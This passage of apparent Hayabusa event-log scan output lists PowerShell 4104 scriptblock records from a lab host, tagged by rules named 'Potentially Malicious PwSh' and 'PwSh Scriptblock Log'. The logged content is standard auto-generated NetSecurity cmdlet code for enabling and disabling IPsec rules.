'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] 